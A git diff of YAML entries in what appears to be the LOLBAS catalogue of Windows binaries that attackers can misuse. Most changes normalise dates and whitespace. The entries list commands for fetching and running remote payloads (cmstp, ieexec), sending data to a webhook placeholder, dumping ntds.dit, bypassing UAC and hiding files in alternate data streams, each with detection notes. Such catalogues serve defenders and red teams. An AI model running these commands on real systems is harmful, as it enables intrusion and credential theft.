@@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmdkey.exe - Path: C:\Windows\SysWOW64\cmdkey.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Usage of this command could be an IOC @@ -23,6 +23,6 @@ Resources: - Link: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey Acknowledgement: - - Person: + - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml index cf8204a..4d68909 100644 --- a/yml/OSBinaries/Cmstp.yml +++ b/yml/OSBinaries/Cmstp.yml @@ -2,11 +2,11 @@ Name: Cmstp.exe Description: Installs or removes a Connection Manager service profile. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf Description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. + Usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. Category: Execute Privileges: User MitreID: T1191 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. - Usecase: Execute code hidden within an inf file. Execute code directly from Internet. + Usecase: Execute code hidden within an inf file. Execute code directly from Internet. Category: AwL bypass Privileges: User MitreID: T1191 
@@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cmstp.exe - Path: C:\Windows\SysWOW64\cmstp.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Execution of cmstp.exe should not be normal unless VPN is in use @@ -40,4 +40,4 @@ Acknowledgement: Handle: '@oddvarmoe' - Person: Nick Tyrer Handle: '@NickTyrer' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/ConfigSecurityPolicy.yml b/yml/OSBinaries/ConfigSecurityPolicy.yml index 0abab90..90c282c 100644 --- a/yml/OSBinaries/ConfigSecurityPolicy.yml +++ b/yml/OSBinaries/ConfigSecurityPolicy.yml @@ -2,7 +2,7 @@ Name: ConfigSecurityPolicy.exe Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads. Author: 'Ialle Teixeira' -Created: '04/09/2020' +Created: 2020-09-04 Commands: - Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile Description: Upload file, credentials or data exfiltration in general @@ -14,9 +14,9 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: ConfigSecurityPolicy storing data into alternate data streams. - IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS. - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe. diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 4abeb42..d130a0a 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml 
@@ -2,7 +2,7 @@ Name: Control.exe Description: Binary used to launch controlpanel items in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: control.exe c:\windows\tasks\file.txt:evil.dll Description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\control.exe - Path: C:\Windows\SysWOW64\control.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Control.exe executing files from alternate data streams. @@ -28,4 +28,4 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Csc.yml b/yml/OSBinaries/Csc.yml index 3b19bdf..c792f90 100644 --- a/yml/OSBinaries/Csc.yml +++ b/yml/OSBinaries/Csc.yml @@ -1,8 +1,8 @@ --- Name: Csc.exe -Description: Binary file used by .NET to compile C# code +Description: Binary file used by .NET to compile C# code Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: csc.exe -out:My.exe File.cs Description: Use CSC.EXE to compile C# code stored in File.cs and output the compiled version to My.exe. @@ -23,13 +23,13 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: Csc.exe should normally not run a system unless it is used for development. + - IOC: Csc.exe should normally not run a system unless it is used for development. Resources: - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe Acknowledgement: - - Person: + - Person: Handle: ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 0027aba..f3ae9ac 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml 
@@ -2,7 +2,7 @@ Name: Cscript.exe Description: Binary used to execute scripts in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: cscript c:\ads\file.txt:script.vbs Description: Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS). @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Cscript.exe executing files from alternate data streams @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 97b2f85..2a0df33 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -2,7 +2,7 @@ Name: Desktopimgdownldr.exe Description: Windows binary used to configure lockscreen/desktop image Author: Gal Kristal -Created: 28/06/2020 +Created: 2020-06-28 Commands: - Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr Description: Downloads the file and sets it as the computer's lockscreen @@ -14,9 +14,9 @@ Commands: OperatingSystem: Windows 10 Full_Path: - Path: c:\windows\system32\desktopimgdownldr.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: desktopimgdownldr.exe that creates non-image file - IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl Resources: diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 07cf8ef..7cb34fc 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml 
@@ -2,9 +2,9 @@ Name: Dfsvc.exe Description: ClickOnce engine in Windows used by .NET Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url Usecase: Use binary to bypass Application whitelisting Category: AWL bypass @@ -17,14 +17,14 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index 9c68aa5..f97b748 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -2,11 +2,11 @@ Name: Diantz.exe Description: Binary that package existing files into a cabinet (.cab) file Author: 'Tamir Yehuda' -Created: '08/08/2020' +Created: 2020-08-08 Commands: - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file. - Usecase: Hide data compressed into an Alternate Data Stream. + Usecase: Hide data compressed into an Alternate Data Stream. Category: ADS Privileges: User MitreID: T1096 
@@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1. - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab Description: Download and compress a remote file and store it in a cab file on local machine. - Usecase: Download and compress into a cab file. + Usecase: Download and compress into a cab file. Category: Download Privileges: User MitreID: T1105 @@ -23,9 +23,9 @@ Commands: Full_Path: - Path: c:\windows\system32\diantz.exe - Path: c:\windows\syswow64\diantz.exe -Code_Sample: - - Code: -Detection: +Code_Sample: + - Code: +Detection: - IOC: diantz storing data into alternate data streams. - IOC: diantz getting a file from a remote machine or the internet. Resources: diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index b0164e5..0cf6943 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml @@ -2,7 +2,7 @@ Name: Diskshadow.exe Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS). Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: diskshadow.exe /s c:\test\diskshadow.txt Description: Execute commands using diskshadow.exe from a prepared diskshadow script. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Child process from diskshadow.exe @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 18cf73c..d131ee4 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml 
@@ -2,7 +2,7 @@ Name: Dnscmd.exe Description: A command-line interface for managing DNS servers Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Dnscmd.exe loading dll from UNC path @@ -32,4 +32,4 @@ Acknowledgement: Handle: '@dim0x69' - Person: Nikhil SamratAshok Handle: '@nikhil_mitt' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index f33ba73..2768236 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml @@ -2,12 +2,12 @@ Name: Esentutl.exe Description: Binary for working with Microsoft Joint Engine Technology (JET) database Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o Description: Copies the source VBS file to the destination VBS file. Usecase: Copies files from A to B - Category: Copy + Category: Copy Privileges: User MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 
@@ -29,7 +29,7 @@ Commands: MitreLink: https://attack.mitre.org/wiki/Technique/T1096 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o - Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. + Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file. Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure Category: ADS Privileges: User @@ -47,7 +47,7 @@ Commands: - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit Description: Copies a (locked) file using Volume Shadow Copy Usecase: Copy/extract a locked file such as the AD Database - Category: Copy + Category: Copy Privileges: Admin MitreID: T1003 MitreLink: https://attack.mitre.org/techniques/T1003/ @@ -55,10 +55,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/egre55/status/985994639202283520 - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 235cb88..ead74be 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml 
@@ -2,11 +2,11 @@ Name: Eventvwr.exe Description: Displays Windows Event Logs in a GUI window. Author: 'Jacob Gajek' -Created: '2018-11-01' +Created: 2018-11-01 Commands: - Command: eventvwr.exe Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. - Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. + Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC bypass Privileges: User MitreID: T1088 diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index a4835a2..dfdb845 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml @@ -2,7 +2,7 @@ Name: Expand.exe Description: Binary that expands one or more compressed files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat Description: Copies source file to destination. @@ -31,10 +31,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/infosecn1nja/status/986628482858807297 - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 @@ -43,4 +43,4 @@ Acknowledgement: Handle: '@infosecn1nja' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index 5b65019..5b1ed4c 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml 
@@ -2,7 +2,7 @@ Name: Explorer.exe Description: Binary used for managing files and system components within Windows Author: 'Jai Minton' -Created: '2020-06-24' +Created: 2020-06-24 Commands: - Command: explorer.exe /root,"C:\Windows\System32\calc.exe" Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\explorer.exe - Path: C:\Windows\SysWOW64\explorer.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this. diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 424db7f..cf28b30 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,8 +1,8 @@ --- Name: Extexport.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Extexport.exe c:\test foo bar Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Extexport.exe loads dll and is execute from other folder the original path @@ -24,4 +24,4 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 3addec9..57c9f8f 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml 
@@ -1,12 +1,12 @@ --- Name: Extrac32.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. + Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1096 @@ -14,7 +14,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file. - Usecase: Extract data from cab file and hide it in an alternate data stream. + Usecase: Extract data from cab file and hide it in an alternate data stream. Category: ADS Privileges: User MitreID: T1096 @@ -39,10 +39,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 95668b9..f0a10af 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,8 +1,8 @@ --- Name: Findstr.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. 
@@ -39,7 +39,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: finstr.exe should normally not be invoked on a client system @@ -49,4 +49,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml index 38d3189..4ebc2a6 100644 --- a/yml/OSBinaries/Forfiles.yml +++ b/yml/OSBinaries/Forfiles.yml @@ -2,7 +2,7 @@ Name: Forfiles.exe Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. @@ -23,10 +23,10 @@ Commands: Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://twitter.com/vector_sec/status/896049052642533376 - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -36,4 +36,4 @@ Acknowledgement: Handle: '@vector_sec' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index 3476a96..cbb056d 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -2,7 +2,7 @@ Name: Ftp.exe Description: A binary designed for connecting to FTP servers Author: 'Oddvar Moe' -Created: '2018-12-10' +Created: 2018-12-10 Commands: - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt Description: Executes the commands you put inside the text file. 
@@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: cmd /c as child process of ftp.exe diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index 8a251aa..edb36da 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -2,7 +2,7 @@ Name: GfxDownloadWrapper.exe Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path. Author: Jesus Galvez -Created: Jesus Galvez +Created: 2019-12-27 Commands: - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE" Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service". @@ -169,7 +169,7 @@ Full_Path: - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\ - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\ - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\ -Detection: +Detection: - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com. Resources: - Link: https://www.sothis.tech/author/jgalvez/ diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml index 81fae7a..aeed0cc 100644 --- a/yml/OSBinaries/Gpscript.yml +++ b/yml/OSBinaries/Gpscript.yml 
@@ -1,8 +1,8 @@ --- Name: Gpscript.exe -Description: Used by group policy to process scripts +Description: Used by group policy to process scripts Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: Gpscript /logon Description: Executes logon scripts configured in Group Policy. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\gpscript.exe - Path: C:\Windows\SysWOW64\gpscript.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: Scripts added in local group policy @@ -33,4 +33,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 55f5471..bddcc05 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -2,7 +2,7 @@ Name: Hh.exe Description: Binary used for processing chm files in Windows Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: HH.exe http://some.url/script.ps1 Description: Open the target PowerShell script with HTML Help. @@ -23,7 +23,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\hh.exe - Path: C:\Windows\SysWOW64\hh.exe -Code_Sample: +Code_Sample: - Code: Detection: - IOC: hh.exe should normally not be in use on a normal workstation @@ -32,4 +32,4 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index ad141e3..86b87f4 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -1,8 +1,8 @@ --- Name: Ie4uinit.exe -Description: +Description: Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: ie4uinit.exe -BaseSettings Description: Executes commands from a specially prepared ie4uinit.inf file. 
@@ -17,7 +17,7 @@ Full_Path: - Path: c:\windows\sysWOW64\ie4uinit.exe - Path: c:\windows\system32\ieuinit.inf - Path: c:\windows\sysWOW64\ieuinit.inf -Code_Sample: +Code_Sample: - Code: Detection: - IOC: ie4uinit.exe loading a inf file from outside %windir% @@ -26,4 +26,4 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 922efda..8b46933 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -2,9 +2,9 @@ Name: Ieexec.exe Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location Category: Download @@ -12,7 +12,7 @@ Commands: MitreID: T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe + - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location Category: Execute 
@@ -23,13 +23,13 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe -Code_Sample: +Code_Sample: - Code: Detection: - - IOC: + - IOC: Resources: - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml index 3cbd1b6..7b4ab0c 100644 --- a/yml/OSBinaries/Ilasm.yml +++ b/yml/OSBinaries/Ilasm.yml @@ -2,7 +2,7 @@ Name: Ilasm.exe Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) -Created: 17/03/2020 +Created: 2020-03-17 Commands: - Command: ilasm.exe C:\public\test.txt /exe Description: Binary file used by .NET to compile c# code to .exe @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1127 MitreLink: https://attack.mitre.org/techniques/T1127/ - OperatingSystem: Windows 10,7 + OperatingSystem: Windows 10,7 - Command: ilasm.exe C:\public\test.txt /dll Description: Binary file used by .NET to compile c# code to dll Usecase: A description of the usecase @@ -22,7 +22,7 @@ Commands: Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe -Code_Sample: +Code_Sample: - Code: Resources: - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index a99c341..81e9657 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml 
@@ -2,7 +2,7 @@ Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: InfDefaultInstall.exe Infdefaultinstall.inf Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. @@ -15,7 +15,7 @@ Commands: Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe -Code_Sample: +Code_Sample: - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - IOC: @@ -25,4 +25,4 @@ Resources: Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' ---- \ No newline at end of file +--- diff --git a/yml/OSBinaries/Installutil.yml b/yml/OSBinaries/Installutil.yml index 53283d6..d1a5763 100644 --- a/yml/OSBinaries/Installutil.yml +++ b/yml/OSBinaries/Installutil.yml @@ -2,7 +2,7 @@ Name: Installutil.exe Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies Author: 'Oddvar Moe' -Created: '2018-05-25' +Created: 2018-05-25 Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll Description: Execute the target .NET DLL or EXE. @@ -25,7 +25,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe - Path: 